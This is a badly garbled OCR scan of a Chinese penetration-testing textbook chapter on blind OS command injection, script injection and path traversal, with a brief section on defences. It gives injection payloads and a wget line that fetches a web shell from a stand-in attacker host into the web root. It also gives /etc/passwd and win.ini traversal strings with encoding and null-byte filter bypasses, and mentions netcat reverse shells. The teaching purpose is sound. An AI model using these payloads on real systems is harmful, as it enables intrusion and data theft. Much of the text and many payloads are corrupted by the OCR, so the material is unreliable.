在 前 面 的 示例 中 ， 可 以 直接 确定 是 售 可 以 注入 命令 ， 并 获得 注入 命 




















令 的 执行 结果 ， 因 为 应 用 程序 会 在 啊 应 中 立即 返回 那些 结果 。 然 而 ， 在 
许多 情况 下 ， 这 样 做 是 不 可 能 的 。 可 以 注入 一 个 命令 ， 但 它 不 会 返回 结 
果 ， 也 不 会 以 任何 可 确定 的 方式 影响 应 用 程序 随后 的 处 理 过 程 。 或 者 由 
于 几 个 命令 连接 在 一 起 ， 注 入 命令 的 执行 结果 在 执行 过 程 中 丢失 了 。 

通 音 ， 检 测 命令 注 入 是 否 可 行 的 最 可 靠 方法 是 使 用 时 间 延 到 推断 ， 
类 似 于 前 面 描述 的 利用 盲目 SQL 注 入 时 使 用 的 方法 。 如 果 一 个 潜在 的 漏 
人 
Ay 











渗透 测试 步 又 


(1) 通常 可 以 使 用 ping 命 令 让 服务 器 在 一 段 时 期 内 检测 它 的 
回环 接口 (loopback interface) ， 从 而 触发 时 间 延 迟 。Windows 和 
UNIX 平 台 在 处 理 命令 分 隔 符 与 ping 命 令 方 面 存 在 一 些 细微 的 差 
别 ， 但 是 ， 如 果 没 有 设置 过 小 ， 下 面 的 通用 测试 字符 串 应 该 能 够 在 
两 个 平台 上 引起 30 秒 的 时 间 延 迟 。 


il- ping -i 30 127.0.0.1 x II ping -n 30 127.0.0.1 & 


BU AR DF RE RS ARE a SOP BE ATA EN BI as EA 
漏洞 的 可 能 性 ， 还 应 该 轮流 问 每 一 个 目标 参数 据 交 下 面 的 每 个 测试 
字符 串 ， 并 监控 应 用 程序 进行 啊 应 的 时 间 。 


rl 
ping 1 30 
& ping ~i 30 127.0.0.1 4 
& ping 30 1 


了 本 | oF ié 
+ Ping 127.0.0.1 ; 
80a ping ~i 30 127.0.0.1 40 


(2) 如 果 发 生 时 间 延 运 ， 说 明 应 用 程序 可 能 易于 受到 命令 注 
入 攻击 。 重 复 几 次 测试 过 程 ， 确 定 延 迟 不 是 由 于 网 络 延 时 或 其 他 腊 
Aig. AAs ABBE, FPA RE Ze YEN TB] REI 
古 否 会 随 看 提交 的 值 友 生 对 应 的 变化 。 

(3) 使 用 所 发 现 的 任何 一 个 可 成 功 实施 攻击 的 注入 字符 串 ， 
尝试 注入 男 一 个 更 有 用 的 命令 (如 ]s 或 dir) ， 确 定 是 否 能 够 将 命令 
结果 返回 到 浏览 右上。 

了 (4) 如 果 不 能 直接 获得 命令 执行 结果 ， 还 可 以 采用 其 他 方 
> 


口 可 以 尝试 打开 一 条 通 疝 自己 计算 机 的 带 外 通道 。 尝 试 使 用 
TFTP 上 传 工 具 至 服务 器 ， 使 用 telnet 或 netcat 建 立 一 个 通 向 自己 计算 
机 的 反问 shell， 并 使 用 mail 命 令 通 过 SMTP 发 送 命 令 结 果 。 

口 可 以 将 命令 结果 重 定 向 到 Web 根 目录 下 的 一 个 文件 ， 然 后 使 
用 浏览 器 直接 获取 结果 。 例 如 : 


dir > c:\inetpub\wwwroot\foo.txt 
(5) 一 旦 找到 注入 命令 的 方法 并 能 够 获得 命令 执行 结果 ， 就 











应 当 确 定 自己 的 权限 (通过 使 用 whoami 或 类 似 命令 ， 或 者 尝试 向 
一 个 受 保护 的 目录 写 入 一 个 无 害 的 文件 ) 。 然 后 就 可 以 设法 提升 自 
己 的 权限 ， 进 而 秘密 访问 应 用 程序 中 的 敏感 数据 ， 或 者 通过 被 攻破 
的 服务 器 攻击 其 他 主机 。 


有 了 时， 由 于 茶 些 字符 被 过 滤 挥 ， 或 者 应 用 程序 所 使 用 的 命令 API 的 
特殊 行为 ， 可 能 无 法 注入 一 个 完全 独立 的 命令 。 但 是 ， 攻 击 者 仍然 可 以 
破坏 所 执行 的 命令 的 行为 ， 得 到 想 要 的 结果 。 

笔者 曾 遇 到 这 样 的 情况 : 应 用 程序 癌 操 作 系 统 命令 nslookup 传 递 用 
户 输入 ， 以 查找 用 户 提交 的 域名 的 耳 地 址 。 注 入 新 命令 所 需 的 元 字符 被 
咀 止 ， 但 允许 使 用 < 和 > 字符 重 定向 命令 的 输入 和 输出 。nslookup 命 令 通 
常 输入 菏 个 域名 的 PP 地址 ， 这 似乎 并 未 提供 任何 有 效 的 攻击 向 量 。 但 
和 是， 如 宋 在 这 时 提交 一 个 无 效 域名 ， 该 命令 就 会 输出 错误 消 轧 ， 并 在 其 
中 包含 所 查询 的 域名 。 通 第 ， 这 种 行为 足以 导致 严重 的 攻击 。 

O 提供 一 个 服务 器 可 执行 的 脚本 代码 片段 ， 以 符 代 要 解析 的 域名 。 
可 以 将 这 段 脚本 放 在 引号 中 ， 以 确保 命令 解释 占 将 其 视 为 一 个 令 牌 。 

口 使 用 > 字符 将 命令 的 输出 重 定 癌 到 Web 根 目录 下 的 可 执行 文件 夹 
中 的 某 个 文件 。 由 操作 系统 执行 的 命令 如 下 所 示 : 


nslookup "[script code]" > [/path/to/executable_file] 
日 运行 以 上 命令 时 ， 会 将 以 下 输出 重 定 向 到 可 执行 文件 : 
xx server can't find [script code]: NXDOMAIN 


口 然后 ， 使 用 浏览 器 调用 该 文件 ， 注 入 的 脚本 代码 将 在 服务 占 上 执 
行 。 由 于 大 多 数 脚本 语言 允许 页 面 同时 包含 客户 端 内 容 和 服务 需 端 标 
记 ， 攻 击 者 无 法 控制 的 错误 消息 部 分 将 被 视 为 明文 ， 并 且 会 执行 注入 脚 
本 中 的 标记 。 因 此 ， 攻 击 者 束 可 以 通过 利用 受 限 制 的 命令 注入 条 件 ， 在 
应 用 程序 服务 器 中 插入 一 个 不 受 限制 的 后 门 。 




















A IF 


http://mdsec.net/admin/18/ 


渗透 测试 步 又 


(1) < 和 > 字符 分 别 用 于 将 一 个 文件 的 内 容 指向 命令 的 输入 以 
及 将 命令 的 输出 指向 一 个 文件 。 如 果 不 可 能 使 用 前 面 的 技巧 注入 一 
个 完全 独立 的 命令 ， 仍 然 可 以 使 用 < 和 > 字符 该 取 及 写 入 任意 文件 的 
7 
(2) 应 用 程序 调用 的 许多 操作 系统 命令 接受 大 量 控制 其 行为 

的 命令 行 参数 通常， 用 户 提交 的 输入 以 这 种 参数 的 形式 传送 给 合 
令 处 理 ， 只 需 在 相关 参数 后 插入 一 个 空 阁 ， 就 可 以 在 空格 后 添加 男 
外 一 个 参数 。 例 如 ， 一 个 Web 创 作 应 用 程序 可 能 拥有 一 项 功能 ， 允 
许 服务 器 获得 一 个 用 户 指定 的 URL， 然 后 将 它 的 内 容 呈 现在 浏览 器 
上 进行 编辑 。 如 果 应 用 程序 调用 wget 程 序 ， 那 么 就 可 以 通过 附加 
vt 使用 的 -命令 行 参数 ， 在 服务 器 的 文件 系统 中 写 入 任何 文人 的 
容 。 例 如 : 


url=http: //wahh-attacker. com/%20-0%20c: \inetpub\wwwroot\scripts\ 








cmndasp.asp 


VY ”提示 “许多 命令 注入 攻击 要 求 注入 空格 以 分 隔 命令 行 自 变 
量 。 如 果 攻 击 者 发 现 应 用 程序 过 滤 空 格 ， 并 且 攻 击 的 是 UNIX 平 
台 ， 那 么 他 可 以 使 用 包含 空白 符 字段 分 隔 符 的 $IFS 环 境 变量 代替 空 











动态 执行 漏洞 最 常见 于 PHP 和 Perl 等 语言 。 但 基本 上 ， 任 何 应 用 程 
序 平台 都 可 能 会 向 基于 脚本 的 解释 器 (有 时 位 于 其 他 后 端 服务 器 上 ) 传 
送 用 户 提 交 的 输入 。 





渗透 测试 步 又 


C1) 用 户 提 交 的 所 有 数据 项 都 可 提交 给 动态 执行 函数 。 其 中 
最 常见 的 数据 项 是 cookie 参 数 名 称 和 参数 值 ， 以 及 作为 前 一 项 操作 
结果 保存 在 用 户 资 料 中 的 永久 数据 。 

(2) 尝试 轮 注 癌 目标 参数 提交 下 列 值 : 


;echo%20111111 
echo%20111111 
response.write%20111111 
:response.write%20111111 


(3) 监控 应 用 程序 的 响应 。 如 果 字 符 串 111111 被 单独 返回 
( 即 它 前 面 没 有 其 他 命令 字符 串 ) ， 就 表示 应 用 程序 可 能 易于 受到 
脚本 命令 注入 。 

(4) 如 果 字 符 串 111111 并 未 返回 ， 寻 找 任 何 表示 输入 被 动态 
执行 的 错误 消息 ;， 另 外， 可 能 需要 对 语法 进行 调整 ， 以 实现 注入 任 
意 命 令 的 目的 。 

(5) 如 果 攻 击 的 应 用 程序 使 用 PHP， 可 以 使 用 测试 字符 串 
phpinfo(》。 如 果 它 成 功 执行 ， 应 用 程序 将 返 加 PHP 环境 的 配置 信 

(6) 如 果 应 用 程序 可 能 易于 受到 攻击 ， 与 前 面 描述 的 查找 OS 
a 
列 如 : 


SS 











10.1.6 ”防止 ODS 命令 注入 
通常 来 说 ， 防 止 OS5 命 令 注入 漏洞 的 最 佳 方法 是 完全 避免 直接 调用 








操作 系统 命令 。 几 乎 Web 应 用 程序 所 需要 执行 的 每 个 任务 都 可 以 使 用 内 
置 API 完 成 ， 而 且 攻 击 者 无 法 控制 这 些 API， 使 其 执行 其 他 预料 之 外 的 


AA 
命令 。 


如 果 无 法 避免 要 在 传送 给 操作 系统 命令 解释 器 的 命令 字符 串 中 插入 
用 户 提 交 的 数据 ， 应 用 程序 应 实施 严格 的 防御 来 防止 漏洞 发 生 。 如 果 可 
能 ， 应 使 用 一 份 “ 白 名 单 * 限 制 用 户 只 输入 一 组 特殊 的 值 。 或 者 ， 应 将 输 
入 范围 限制 为 少数 字符 ， 例 如 ， 仪 字母 数字 字符 。 应 拒绝 包含 任何 其 他 
数据 (包括 任何 元 字符 或 空白 符 〉 的 输入 。 

应 用 程序 应 使 用 命令 API 通 过 它 的 名 称 和 命令 行 参 数 启 动 特 殊 的 进 
程 ， 而 不 是 同 支 持 命令 链接 与 重 定 同 的 shell 解 释 器 传送 命令 字符 嘻 ， 从 
而 实施 另 一 层 保 护 。 例 如 ，Java API Runtime.exec 和 ASP.NET API 
Process.Start 并 不 支持 shell 元 字符 ， 如 果 使 用 得 当 ， 它 们 能 够 确保 仅 执 行 








开发 者 想 要 执行 的 命令 。 请 参阅 第 19 章 了 解 与 命令 执行 API 有 关 的 详 
情 。 





通常 而 言 ， 防 止 脚本 注入 漏洞 的 最 佳 方法 是 ， 避 人 免 将 用 户 提 交 的 输 
入 或 者 来 目 用 户 的 数据 传送 给 任何 动态 执行 或 包含 函数 。 如 有 果 由 于 东 种 
原因 必须 传送 用 户 提 交 的 输入 ， 那 么 应 对 相关 输入 进行 严格 的 确认 检查 
以 阻止 任何 攻击 。 如 有 可 能 ， 使 用 一 份 由 已 知 可 靠 的 值 组 成 的 “ 白 名 
单 ”， 并 拒绝 任何 没有 出 现在 这 个 名 单 上 的 输入 。 如 果 无 法 做 到 这 一 
点 ， 应 根据 一 组 已 知 无 害 的 字符 [如 字母 数字 字符 《空白 符 除 外 ) ] 检 查 
在 输入 中 使 用 的 字符 。 











10.2 ”操作 文件 路 径 





Web 应 用 程序 中 的 许多 功能 通常 都 需要 处 理 用 户 以 文件 或 目录 名 提 
交 的 输入 。 一 般 情 况 下 ， 这 些 输入 会 传递 给 接受 文件 路 径 的 API《〈 例 
如 ， 用 于 检索 本 地 文件 系统 中 的 文件 ) 。 应 用 程序 将 在 它 对 用 户 请 求 的 
啊 应 中 处 理 该 API 调 用 的 结果 。 如 采用 户 提 交 的 输入 未 经 过 正确 确认 ， 
这 种 行为 就 可 能 导致 各 种 安全 漏洞 ， 其 中 最 常见 的 是 文件 路 径 过 历 漏洞 
和 文件 包含 漏洞 。 








如 果 应 用 程序 使 用 用 户 可 控制 的 数据 、 以 危险 的 方式 访问 位 于 应 用 
程序 服务 器 或 其 他 后 端 文件 系统 中 的 文件 和 目录 ， 就 会 出 现 路 径 遇 历 漏 
洞 。 通 过 提交 专门 设计 的 输入 ， 攻 击 者 就 可 以 在 被 访问 的 文件 系统 中 读 
取 或 者 写 入 任意 内 容 。 这 种 漏洞 往往 使 攻击 者 能 够 从 服务 器 上 读 取 敏感 
信息 或 者 重 写 敏 感 文件 ， 并 最 终 在 服务 右上 执行 任何 命令 。 

在 下 面 的 示例 中 ， 应 用 程序 使 用 一 个 动态 页 面 癌 客 户 疹 返回 静态 图 
像 。 被 请 求 图 像 的 名 称 在 查询 字符 串 参 数 中 指定 : 


http: //mdsec.net/Lilestore/8/GetFile.ashx?filename-keira.jpe¢ 


当 服 务 絮 处 理 这 个 请 求 时 ， 它 执行 以 下 操作 。 

(1) 从 查询 字符 串 中 提取 和 ename 参 数值 。 

(2) 将 这 个 值 附加 在 C:\filestore\ 之 后 。 

(3) 用 这 个 名 称 打开 文件 。 

(4) 读 取 文件 的 内 容 并 将 其 返回 给 客户 端 。 

漏洞 之 所 以 会 发 生 ， 是 因为 攻击 者 可 以 将 路 径 过 历 序列 Cpath 
traversal sequence) 放 入 文件 名 内 ， 从 第 (2) 步 指定 的 图 像 目录 同上 回 
调 ， 从 而 访问 服务 器 上 的 任何 文件 。 众 所 周知 ， 路 径 过 历 序列 表示 
为 “点 一 点 一 斜 线 ”(.、\) ， 一 个 典型 的 攻击 如 下 : 


http: //mdsec.net/filestore/8/GetPFile.ashx?filename=..\windows\win.ini 


如 果 应 用 程序 把 filename 参 数 的 值 附 加 到 图 像 目 录 名 称 之 后 ， 就 得 
到 以 下 路 径 : 


C:\filestore\..\windows\win. ini 


这 两 个 志 历 序列 立即 从 图 像 目录 回溯 到 C: 驱动 右 根 目录 下 ， 因 此 




















前 面 的 路 径 等 同 于 以 下 路 径 : 


C:\windows\win.ini 


a 因此 ， 服 务 器 不 会 返回 图 像 文件 ， 而 是 返回 默认 的 Windows 配 置 文 


We 
—\/ 

-> 注解 在 旧版 Windows IIS Web 服 务 器 中 ， 默 认 情况 下 ， 应 
用 程序 将 在 本 地 系统 权限 下 运行 ， 因 而 能 够 访问 本 地 文件 系统 上 的 
任何 可 读 文件 。 在 较 新 的 版 本 中 ， 和 许多 其 他 Web 服 务 器 一 样 ， 服 
务 器 进程 默认 以 权限 较 低 的 用 户 账户 运行 。 因 此 ， 在 探查 路 径 裔 历 
漏洞 时 ， 最 好 是 请 求 一 个 可 由 任何 类 型 的 用 户 读 取 的 默认 文件 ， 如 


c:\windows\win.ini. 


在 这 个 简单 的 示例 中 ， 应 用 程序 并 未 实施 防御 ， 阻 止 路 径 遇 历 攻 
击 。 然 而 ， 由 于 这 些 攻 击 早 已 广为人知 ， 应 用 程序 通常 会 针对 它们 实施 
各 种 防御 ， 大 多 数 情 况 下 是 采取 输入 确认 过 小 。 在 后 文中 会 讲 到 ， 这 些 
过 涯 往往 并 不 可 笔 ， 可 被 技术 熟练 的 攻击 者 轻易 避 开 。 





























Al, yn vw) 
笑 试 访问 
http://mdsec.net/filestore/8/ 


1. 查找 和 利用 路 径 裔 历 漏洞 

许多 功能 都 要 求 Web 应 用 程序 根据 用 户 在 请 求 中 提交 的 参数 回 文 件 
系统 读 取 或 写 入 数据 。 如 果 以 不 安全 的 方式 执行 这 些 操 作 ， 攻 击 者 就 可 
以 提交 专门 设计 的 输入 ， 使 应 用 程序 访问 开发 者 并 不 希望 它 访问 的 文 
件 。 这 类 漏洞 称 为 路 径 遍 历 (path traversal) 漏洞 ， 攻 击 者 可 利用 这 种 
漏洞 读 取 密 码 和 应 用 程序 日 志 之 类 的 敏感 数据 ， 或 者 重 写 安 全 性 至 关 重 
要 的 数据 项 ， 如 配置 文件 和 软件 代码 。 在 最 为 严重 的 情况 下 ， 这 种 漏洞 
可 使 攻击 者 能 够 完全 攻破 应 用 程序 与 基础 操作 系统 。 

有 时 ， 路 径 过 历 漏 洞 很 难 发 现 ， 并 且 许 多 Web 应 用 程序 对 它们 实施 
的 防御 也 十 分 脆弱 。 下 面 我 们 将 介绍 攻击 者 在 确定 湾 在 的 目标 、 探 查 易 
受 攻 击 的 行为 、 避 开 应 用 程序 防御 以 及 处 理 定 制 编码 的 过 程 中 所 采用 的 
各 种 技巧 。 

@ 确定 攻击 目标 

在 对 应 用 程序 进行 初步 解析 的 过 程 中 ， 应 该 已 经 确定 了 所 有 与 路 径 
裔 历 漏洞 有 关 的 明显 受 攻击 面 。 主 要 用 于 文件 上 传 或 下 载 目的 的 所 有 功 
能 都 应 进行 全 面 测试 。 用 户 可 共享 文档 的 工作 流程 应 用 程序 ， 人 允许 用 户 
上 传 图 像 的 博客 与 拍卖 应 用 程序 ， 以 及 为 用 户 提 供电 子 书 、 技 术 手 册 和 
公司 报表 等 文档 的 信息 型 应 用 程序 ， 常 常 使 用 这 种 功能 。 

除 这 种 明显 的 目标 功能 外 ， 还 有 其 他 各 种 行为 表示 应 用 程序 需要 与 
文件 系统 进行 交互 。 



































HE MNS Te 
(1) 分 析 在 应 用 程序 解析 过 程 中 收集 到 的 信息 ， 确 定 以 下 内 
口 请求 参数 中 明显 包含 文件 或 目录 名 称 的 所 有 情形 。 例 


如 ，include=main.inc 或 template= /en/sidebar。 
口 需要 从 服务 器 文件 系统 〈 相 对 于 后 站 数据 库 ) 读 取 数 据 
的 所 有 应 用 程序 功能 。 例 如 ， 显 示 办 公文 档 或 图 像 。 
(2) 在 测试 其 他 漏洞 的 过 程 中 ， 寻 找 有 益 的 错误 消息 或 其 他 
反常 事件 。 设 法 确定 用 户 提 交 的 数据 被 传送 给 文件 API 或 作为 操作 
系统 命令 参数 的 所 有 情况 。 











YY 提示 “如果 攻击 者 已 经 从 本 地 访问 应 用 程序 [通过 了 白 盒 
测试 Cwhite-box testing) ， 或 者 因为 已 经 攻破 了 服务 器 的 操作 系 

统 」， 那 么 往往 能 够 直接 确定 路 径 壳 历 目标 ， 因 为 他 可 以 监控 应 用 
程序 与 文件 系统 之 间 的 全 部 交互 。 





渗透 测 试 步 又 


如 果 能 够 从 本 地 访问 应 用 程序 ， 执 行 以 下 操作 。 

(1) 使 用 适当 的 工具 监控 服务 器 上 的 所 有 文件 系统 活动 。 例 
如 ， 可 以 在 Windows 平 台 上 使 用 SysInternals 开 发 的 FileMon 工 具 ， 

在 Linux 平 台 上 使 用 ltrace/strace 工 具 ， 在 Sun Solaris 平 台 上 使 用 truss 
命令 。 

(2) 在 每 一 个 被 提交 的 参数 (包括 全 部 cookie、 查 询 字 符 串 字 
段 和 POST 数据 项 ) 中 插入 一 个 特殊 的 字符 串 《〈 如 traversaltest) 测 
试 应 用 程序 的 每 一 个 页 面 。 一 次 仅 针 对 一 个 参数 进行 测试 ， 并 使 用 
第 14 章 描述 的 上 自动 搁 巧 加 速 测试 过 程 。 

(3) 在 文件 系统 监控 工具 中 设置 一 个 过 滤器 ， 确 定 所 有 包含 
测试 字符 串 的 文件 系统 事件 。 

C4) 如 果 发 现 测 斌 字符 串 被 用 作文 件 或 目录 ， 或 者 出 现在 文 
件 或 目录 名 中 ， 那 么 对 每 一 种 情况 进行 测试 〈 如 下 所 述 ) ， 确 定 其 
是 否 易于 受到 路 径 壳 历 攻击 。 


© 探查 路 径 饥 有 历 漏洞 

确定 各 种 潜在 的 路 径 抽 历 测 试 目 标 后 ， 必 须 分 别 训 试 每 种 情况 ， 卉 
清 其 是 否 以 不 安全 的 方式 癌 相 关 文 件 系统 操作 传送 用 尸 可 控制 的 数据 。 

在 训 试 用 户 提交 的 参数 时 ， 需 确定 轴 历 序列 是 人 否 被 应 用 程序 阻止， 
或 者 它们 是 人 否 能 够 正常 工作 。 通 常 ， 提 交 不 会 铝 上 回溯 到 起 始 目 录 的 亿 
历 序列 是 一 种 较为 可 靠 的 初步 测试 方法 。 

















渗透 测试 步 又 


(1) 假设 所 针对 的 参数 被 附加 到 应 用 程序 预先 设 定 的 目录 之 
后 ， 那 么 插入 任意 一 个 子 目录 和 一 个 遍历 序列 ， 修 改 参数 的 值 。 例 
如 ， 如 果 应 用 程序 提交 参数 


file=foo/filel.txt 
那么 可 以 尝试 提交 以 下 值 : 
File=foo/ parry). /Eile Exe 


SOR Ba AE Oe PM AREER AT A ee lel, teen’ FCB 
ere ee 
同 的 文件 。 

(2) 在 上 述 两 种 情况 下 ， 如 果 应 用 程序 的 行为 有 所 不 同 ， 那 
么 应 用 程序 可 能 阻止 、 删 除 或 净化 所 历 序 列 ， 致 使 文件 路 径 失 效 。 
需要 研究 是 否 可 通过 其 他 方法 如 开 应 用 程序 的 确认 过 滤 请 参阅 下 
面 讨论 的 内 容 ) 。 

即使 子 目录 “bar” 并 不 存在 ， 这 个 测试 仍然 有 效 ， 因 为 大 多 数 文 
件 系统 在 符 试 获取 文件 路 径 前 对 其 进行 了 规范 化 。 路 径 序 列 删 除了 
虚构 的 目录 ， 因 此 服务 强 并 不 检查 它 是 否 存 在 。 


如 果 发 现 提交 吉 历 序列 但 不 向 上 回溯 至 起 始 目 录 不 会 影响 应 用 程序 
的 行为 ， 那 么 在 接 下 来 的 测试 中 ， 应 该 尝试 过 历 出 起 始 目 录 ， 从 服务 如 
文件 系统 的 其 他 地 方 访 问 文件 。 























渗透 测试 步 又 


C1) 如 果 所 攻击 的 应 用 程序 功能 只 拥有 文件 读 取 访问 权限 ， 
那么 尝试 访问 相关 操作 系统 上 的 一 个 已 知 任何 用 户 均 可 读 取 的 文 
件 。 提 交 下 面 其 中 一 个 值 作为 受 控制 的 文件 名 参数 : 


/ / Aa ee ~ 
EE ds A ie etí c/passwd 


fase are hae od ed A Le / /../../windows/win.ini 


SISA, pve dd 显示 请 求 的 文件 的 内 容 ， 如 图 10-5 所 示 。 
Ae LLTO Apion AS 
A E 





-/../../../etc/passwd 
-/../../../windows/win.ini 


STIS BTA A ER ee a A h 


STIR SORE A A) 
I A A AE 

















(2) 如 果 所 攻击 的 功能 拥有 文件 写 入 访问 权限 ， 那 么 要 最 终 
确定 应 用 程序 是 个 易于 受到 攻击 ， 可 能 会 更 困难 。 通 向， 一 种 有 效 
的 测试 是 尝试 写 入 两 个 文件 ， 一 个 文件 可 被 任何 用 户 写 入 ， 男 一 个 
文件 即使 是 根 用 户 或 管理 员 也 禁止 写 入 。 例 如 ， 在 Windows 平 台 上 
可 以 答 试 写 入 下 面 两 个 文件 : 














在 UNIX 平 台 上 ， 禁止 根 用 户 写 入 的 文件 取决 于 使 用 的 平台 版 
A, {AS 试用 一 个 文件 重 写 一 个 目录 绝 不 可 外 EB 取得 成 功 ， 因 此 可 以 
进行 以 下 尝试 : 


Perse (Stren FETE Meee ny Amer Nai og Ave ond (OE OS FES EESE NO J -/tmp/wr it 全 人 全 St。 CXE 





/ / / f 
六 /tmp 


在 上 面 的 每 对 测试 中 ， 如 果 应 用 程序 在 响应 两 个 请 求 时 表现 出 
行为 差异 《〈 例 如 ， 啊 应 第 二 个 请 求 时 返回 一 条 错误 消息 ， 而 啊 应 第 
一 个 请 求 时 不 返回 错误 消息 ) ， 那 么 应 用 程序 可 外 易于 受到 攻击 。 

(3) 还 有 另 一 种 方法 可 通过 写 入 访问 确定 遍历 漏洞 ， 即 尝试 
在 Web 服 务 器 的 Web 根 目录 中 写 入 一 个 新 文件 ， 然 后 尝试 通过 浏览 
器 获得 这 个 文件 。 但 是 ， 如 果 并 不 知道 Web 根 目录 的 位 置 ， 或 者 访 
问 文 件 的 用 户 并 不 拥有 写 入 权限 ， 这 种 方法 可 能 不 会 成 功 。 


a 
S 
= 注解 ”几乎 每 一 种 文件 系统 都 接受 试图 向 上 回溯 到 文件 系 
统 根 目录 的 多 余 遍 历 序列 。 因 此 ， 当 探查 漏洞 时 ， 像 在 上 面 的 示例 
中 一 样 ， 最 好 提交 大 量 的 遍历 序列 。 附 加 数据 的 起 始 目 录 可 能 位 于 
文件 系统 的 “ 深 处 >， 因 此 使 用 大 量 的 序列 有 助 于 避免 错误 警报 。 
而 且 ，Windows 平 台 接 受 斜 线 (/) FURIE CO) 作为 目录 分 
隔 符 ， 而 UNIX 平 台 只 接受 斜 线 作 为 分 隔 符 。 另 外 ， 一 些 wWeb 应 用 
程序 过 滤 两 者 之 一 。 即 使 完全 确信 Web 服 务 器 运行 的 是 UNIX 操 作 
系统 ， 但 应 用 程序 仍然 可 能 被 Windows 后 端 组 件 调用 。 为 此 ， 当 探 
查 遍 历 漏洞 时 ， 最 好 两 者 都 进行 测试 。 





9 FME Boo eats 

BOA Ber AR 并 未 成 功 ， 并 不 意味 着 应 用 程序 
不 容易 受到 攻击 。 许 多 应 用 程序 开发 者 意识 到 路 径 遍 爵 漏 筒 ， 并 执行 各 
试 防止 这 种 漏洞 。 但 是 ， 这 些 防 御 措 施 往往 存在 缺 

， 可 被 撤 术 熟练 的 攻击 者 轻易 避 开 。 

第 一 种 币 见 的 输入 过 沽 方法 如 下 ， 首 移 检 查 文件 名 参数 中 是 否 存在 
任何 路 径 过 历 序 列 ， 如 果 存 在 ， 要 么 拒绝 包含 吉 历 序列 的 请 求 ， 要 么 实 
试 删除 该 序列 ， 以 对 输入 进行 净化 。 这 种 类 型 的 过 滤 往 往 易于 受到 各 种 
攻击 ， 它 们 使 用 编码 或 其 他 方法 来 避 开 过 小 。 这 类 攻击 全 都 利用 输入 确 
认 机 制 所 面临 的 规范 化 问题 ， 我 们 在 第 2 章 已 经 讲 过 。 








渗透 测试 步 又 


(1) 和 尝 试 始终 通过 使 用 和 斜 线 与 反 和 斜 线 的 路 径 过 历 序列 进行 测 
0 而 文件 系统 却 支 持 全 部 两 种 
子 列 。 

(2) 尝试 使 用 下 面 的 编码 方案 ， 对 裔 历 序列 进行 简单 的 URL 
编 码 。 一 定 要 对 输入 中 的 每 个 料 线 与 点 进行 编码 : 

O 点 一 一 42e 


"Ec 2f 
D meee 一 一 85c 


(3) 尝试 使 用 下 面 的 16 位 Unicode 编 码 : 
O 点 一 一 %u002e 
口 射线 EE 
O 反射 线 一 一 $u2216 
(4) 尝试 使 用 下 面 的 双 倍 URL 编 码 : 
GOR %252e 
口 ste 2252f 
O Ree $255¢ 
(5) 尝试 使 用 下 面 的 超 长 UTF-8 Unicode 编 码 : 

















口 点 sc0s2e、gse08s408sae、gscoae 等 
O Hee ScOgSaf 、%Se0%80%af 、%Sc0%2f 等 
口 Ree sc0s5c、sc0s808s5c 等 





可 以 在 Burp Intruder 中 使 用 非法 Unicode 有 效 载 集 类 型 为 任何 特 
殊 字 符 生 成 大 量 其 他 形式 的 表示 法 ， 并 将 它 提交 到 目标 参数 的 相关 
位 置 。 这 些 表 示 法 严重 违反 了 Unicode 表 示 法 规则 ， 但 却 为 许多 
Unicode 解 码 器 接受 ， 特 别 是 Windows 平 台 上 的 解码 器 。 

(6) 如 果 应 用 程序 尝试 通过 删除 所 历 序列 来 净化 用 户 输 入 ， 
但 没有 以 递归 的 方式 应 用 这 种 过 滤 ， 那 么 可 以 用 一 个 序列 蔡 换 另 一 
个 序列 来 避 开 过 滤 。 例 如 : 








ALL yn vw) 

IAW IH 
http://mdsec.net/filestore/30/ 
http://mdsec.net/filestore/39/ 
http://mdsec.net/filestore/46/ 


http://mdsec.net/filestore/59/ 
http://mdsec.net/filestore/65/ 


第 二 种 防御 路 径 遇 历 攻 击 时 常用 的 输入 过 沽 ， 惑 是 确认 用 户 提 交 的 
输入 是 全 包含 应 用 程序 想 要 的 后 级 (如 文件 类 型 或 前 级 《如 起 始 目 
Tia 这 种 类 型 的 防御 可 以 与 前 面 描述 的 过 滤 联 合 使 用 。 





渗透 测试 步 又 


(1) 一 些 应 用 程序 检查 用 户 提 交 的 文件 是 否 以 一 种 或 一 组 特 
殊 的 文件 类 型 结尾 ， 并 拒绝 访问 其 他 内 容 的 请 求 。 有 了 时候， 可 以 在 
请 求 的 文件 名 后 放 入 一 个 URL 编 码 的 空 字 节 ， 在 后 面 连接 应 用 程序 
接受 的 文件 类 型 ， 从 而 避 开 这 种 检查 。 例 如 : 


../../../../../boot.init00.jpg 


这 种 攻击 有 时 会 成 功 ， 是 因为 应 用 程序 使 用 API 在 托管 执行 环 
境 下 执行 文件 类 型 检查 ， 该 执行 环境 允许 字符 串 包含 空 字符 (如 
Java 中 的 String.endsWith() ) 。 但 是 ， 当 获取 文件 时 ， 应 用 程序 
最 终 在 一 个 无 法 控制 的 环境 (其 中 的 字符 串 以 空白 字符 结束 〉 中 使 
用 API， 因 此 文件 名 被 截 短 为 想 要 的 值 。 

(2) 一 些 应 用 程序 将 它们 自己 的 文件 类 型 后 级 附加 在 用 户 提 
交 的 文件 名 后 ， 尝 试 控制 被 访问 的 文件 类 型 。 在 这 种 情况 下 ， 基 于 
相同 的 原因 ， 前 面 的 任何 一 种 利用 都 可 能 取得 成 功 。 

(3) 一 些 应 用 程序 检查 用 户 提 交 的 文件 名 的 开头 部 分 是 否 大 
起 始 目录 的 某 一 个 子 目 录 ， 或 者 一 个 特殊 的 文件 名 。 当 然 ， 通 过 以 
下 方法 可 轻易 避 开 这 种 检查 : 


filestore/../../../../../../../etc/passwd 


(4) 如 果 以 上 针对 输入 过 滤 的 攻击 都 无 法 成 功 ， 可 能 应 用 程 
序 实施 了 几 种 类 型 的 过 滤 ， 因 此 需要 同时 使 用 上 面 的 几 种 攻击 方法 
(同时 针对 人 遍历 序列 过 小 与 文件 类 型 或 目录 过 小 ) 。 巡 到 这 种 情 
- eee 最 好 的 办 法 是 将 问题 分 解 成 几 个 独立 的 阶段 。 例 
0， 如 果 请 求 


diagraml. jpg 
能 够 成 功 ， 但 请 求 


foo/..ydaiagraml . jpg 


HERAK ABA SAVE AA A Be ae, EBA pO 
获得 成 功 。 如 果 使 用 这 些 成 功 的 过 有 历 序列 仍然 无 法 访 

问 /etc/passwd， 束 请 求 以 下 文件 ， 检 查 应 用 程序 是 否 实施 任何 文件 
类 型 过 滤 ， 以 及 是 否 可 以 避 开 这 种 过 滤 : 

















diagraml. jpg%00 .jpg 


彻底 检查 应 用 程序 定义 的 起 始 目 录 ， 设 法 了 解 它 实施 的 全 部 过 
